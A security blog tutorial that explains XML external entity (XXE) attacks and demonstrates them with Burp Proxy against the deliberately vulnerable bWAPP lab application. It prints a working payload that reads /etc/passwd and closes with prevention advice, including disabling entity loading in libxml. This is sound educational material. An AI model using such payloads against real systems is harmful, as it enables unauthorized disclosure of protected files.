The Lesser Known XE Attack

The Meaning

XE which stands for XML Entity is a standard for representing sets of data. Meanwhile, Entities are more like shortcuts to standard text or special characters e.g. wherever you see “X” replace it with “Y”.

An entity can be declared either internal or external.

An internal entity is defined in-line like a macro. Syntax example will look like this (<!ENTITY entity-name “entity-value”>).

An external entity points to data in an external file like an import or include statement. Syntax example will look like this (<!ENTITY entity-name SYSTEM “URI/URL”>).

The Idea

XE Attack is an attack on an XML application that parses XML input from untrusted sources using an incorrectly configured XML parser. The attack enables attackers to disclose normally protected resources from the system.

The idea behind the attack is that when parsing the XML document, the parser will expand these links and include the content of the URI in the returned XML document.

An XML application is easily identified with a declaration like this “<?xml version=”1.0″?>” or a similar syntax to this “<email><send> test </send></email>”

Demo Internal Entity Calls

For demonstration purposes, we will be using the following tools:

Access the webpage and click on ‘Forgot Password’ under ‘Login Button’

Forgot Password

Set-up burp proxy to intercept ‘Forgot Password’ request

complement the XML element

Observing from the figure above, the application transmits data using XML and Burp proxy added another sub-tab to complement the XML element

Send the request to repeater and observe the response. Based on the response, we understand that the application is processing XML, receiving certain input and returning it back.

xml syntax

In order to test whether the XML parser is parsing and executing our entries we used the following xml syntax, this is necessary because we are defining a new entity to the application:

<?xml version=”1.0″ encoding=”utf-8″?>       //Initiating xml and selecting character encode type
<!DOCTYPE Header [                                      //Defining the header
<!ENTITY newentity “testing”> ]>                   //Declaring the entity, we used the internal entity
<forgot><username>&newentity;</username></forgot>    //Parsing the entity to return it value

newentity

As seen in the above request, we have now introduced an entity within the request (newentity). The response clearly indicates the XML parser has parsed whatever we have sent and accordingly echoed back the value. This confirms the application is vulnerable to xml entity attacks.

Exploiting XML External Entities

For exploitation we will be using the following:

  • Burp Proxy – To intercept and edit the request
  • Bee-Box – Is a custom Linux Ubuntu virtual machine (VM), pre-installed with bWAPP
  • bWAPP – Is a buggy web application, deliberately insecure

Start bWAPP on bee-box VM and login with bee/bug credentials. Navigate to bug hunt and select XML External Entity Attacks (XXE) click on hack button and the below page will display.

any bugs button

Set-up burp proxy to intercept ‘any bugs button’ request

application transmits data using xml

Observing from the figure above, the application transmits data using xml and burp proxy added another sub-tab to complement the XML element

Send the request to repeater and observe the response. Looking at the figure below, we understand that the application is processing XML, receiving certain input and returning it back

change the value

In order to return the contents back from the external entity we change the value in login parameter to &bWAPP; (& symbol is an indicator of entity) The XML parser should look up the value of the system entity variable bWAPP and substitute the entity declaration for the content of the file, for this we use the following xml syntax:

<?xml version=”1.0″ encoding=”utf-8″?>                     //Initiating xml and selecting character encode type
<!DOCTYPE Header [                                                 //Defining the header
<!ENTITY bWAPP SYSTEM “file:///etc/passwd”> ]>     //The variable SYSTEM means system path and we are accessing the passwd file contents directly through the URI of the local system
<reset><login>&bWAPP;</login><secret>Anything</secret></reset>         //Parsing the entity to return it value

local resource passwd file

When we check the response from the above figure, we can see the local resource passwd file contents were returned.

 Preventing XE Attacks

XML Entity (XE) attacks, which can cause denial of service to the local/remote systems, gain unauthorized access to files on the local machine, and allow scanning of remote machines can be avoided if the user inputs are validated just like preventing any other injection attacks.

However, it may not be easy or possible to validate data present within the system identifier. Therefore, a recommended solution would be to configure the XML processor to use a local static entity and disallow any declared entity included in the XML document.

Setting some respective attributes such as external entities, parameter entities, and inline DTD to false, will also prevent xml entity attacks.

Considering the example of the BWAPP application which we exploited, we can review and modify the source code to make it more secure. The application is developed in PHP which uses the library LIBXML for XML processing.

We can disable external entity loading in LIBXML using the function
libxml_disable_entity_loader() as shown below

discussion on OWASP

For other software platforms, refer to the detailed discussion on OWASP, which provides attributes that can be disabled in various technologies.

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

 

Suleiman Farouk

Suleiman Farouk (CEH, CISC, CPFA, CPH, MCITP, MTA-Security) works as a Security Analyst in NII. An expert in the field of Vulnerability Assessment and Penetration Testing. He is well versed with international standards such as OWASP and WASC. He is an active member and speaker at null/OWASP Mumbai Chapter meet.

Latest posts by Suleiman Farouk (see all)

Share This

1 Comment

Leave a Reply

Your email address will not be published.


*